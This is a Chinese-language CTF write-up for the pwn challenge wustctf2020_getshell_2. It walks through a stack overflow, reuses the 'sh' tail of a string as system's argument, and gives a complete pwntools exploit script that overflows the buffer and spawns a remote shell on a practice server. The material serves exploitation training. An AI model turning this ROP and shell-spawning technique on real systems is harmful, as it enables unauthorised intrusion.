wustctf2020_getshell_2

本文讲述了在WUSTCCTF2020_getshell_2任务中,通过检查和IDA分析发现了一个栈溢出漏洞。挑战者需利用system函数的间接调用,避开直接写'/bin/sh',找到隐藏的后门地址。作者详细介绍了利用ROP技术和payload构造过程,最终实现远程shell获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

wustctf2020_getshell_2

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行,应该和1一样是道栈溢出题目。

放进IDA中查看:
在这里插入图片描述
在这里插入图片描述
和1一样主函数中给出漏洞函数,漏洞函数中直接一个栈溢出。

但是后门函数并没有直接给出system(/bin/sh),而是给了system("/bbbbbbbbin_what_the_f?ck__--??/sh")

这样就不能直接调用后门函数进行getshell。虽然没有给/bin/sh,但是这串字符串的最后sh可以用作参数,同样可以获取到shell。

记录下地址:0x08048670
在这里插入图片描述
也可以使用ROPgadget直接找出地址:
在这里插入图片描述

但是没法利用system@plt地址,因为plt地址需要返回值,可溢出的地址位数不够0x24-0x18=0xc,所以只能用shell()里的call system来调用system,call函数不用返回值了,它会自己把下一条指令给压进去

exp:

from pwn import *

#start
r = remote("node4.buuoj.cn",29609)
# r = process("../buu/wustctf2020_getshell_2")

#params
sh_addr = 0x08048670
system_addr = 0x08048529

#attack
payload = b'M'*(0x18+4) + p32(system_addr) + p32(sh_addr)
r.recv()
r.sendline(payload)

r.interactive()
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值